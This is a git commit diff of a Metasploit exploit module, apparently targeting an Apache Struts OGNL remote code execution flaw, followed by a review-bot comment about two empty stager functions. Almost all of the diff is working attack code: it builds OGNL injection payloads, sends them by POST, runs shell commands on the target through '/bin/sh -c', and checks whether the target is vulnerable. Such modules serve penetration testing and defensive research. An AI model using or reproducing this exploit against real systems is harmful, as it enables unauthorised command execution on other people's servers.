send http request (get -> post)

bug/bundler_fix
join-us 2016-04-30 00:08:00 +08:00
parent 643591546e
commit 9e56bb8358
1 changed files with 19 additions and 17 deletions


@ -50,27 +50,23 @@ class MetasploitModule < Msf::Exploit::Remote
], self.class)
end
def send_http_request(payload)
def send_http_request(payload, params)
uri = normalize_uri(datastore['TARGETURI'])
send_request_cgi(
'uri' => uri + payload,
'version' => '1.1',
'method' => 'GET')
'method' => 'POST',
'vars_post' => params
)
end
def parameterize(params) # params is a hash
URI.escape(params.collect { |k, v| "#{k}=#{v}" }.join('&'))
end
def generate_rce_payload(code, params_hash)
def generate_rce_payload(code)
payload = "?method:"
payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
payload << ","
payload << Rex::Text.uri_encode(code)
payload << ","
payload << Rex::Text.uri_encode("1?#xx:#request.toString")
payload << "&"
payload << parameterize(params_hash)
payload
end
@ -94,9 +90,9 @@ class MetasploitModule < Msf::Exploit::Remote
code << "##{var_b}.close()"
params_hash = { var_c => filename, var_d => content }
payload = generate_rce_payload(code, params_hash)
payload = generate_rce_payload(code)
send_http_request(payload)
send_http_request(payload, params_hash)
end
def execute_command(cmd)
@ -119,9 +115,9 @@ class MetasploitModule < Msf::Exploit::Remote
cmd.tr!(' ', '+') if cmd && cmd.include?(' ')
params_hash = { var_f => cmd }
payload = generate_rce_payload(code, params_hash)
payload = generate_rce_payload(code)
send_http_request(payload)
send_http_request(payload, params_hash)
end
def linux_stager
@ -140,6 +136,12 @@ class MetasploitModule < Msf::Exploit::Remote
execute_command("/bin/sh -c #{payload_exe}")
end
def windows_stager
end
def java_stager
end
def exploit
case target['Platform']
when 'linux'
@ -169,9 +171,9 @@ class MetasploitModule < Msf::Exploit::Remote
code << "##{var_a}.close()"
params_hash = { var_b => flag }
payload = generate_rce_payload(code, params_hash)
payload = generate_rce_payload(code)
resp = send_http_request(payload)
resp = send_http_request(payload, params_hash)
if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}")
Exploit::CheckCode::Appears
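Review bot: `windows_stager` and `java_stager`, added in the `-140,6 +136,12` hunk, have empty bodies, so any call to them returns nil and the run ends without telling the operator that nothing was attempted. The `case target['Platform']` in `exploit` continues outside the hunk, so whether its branches reach these stubs is not visible here. If they do, each stub should fail explicitly until it is implemented, for example `fail_with(Failure::NoTarget, 'Windows stager is not implemented')`, with the matching line in `java_stager`. At a minimum, a `# TODO: not implemented` comment in each body would show that the emptiness is deliberate.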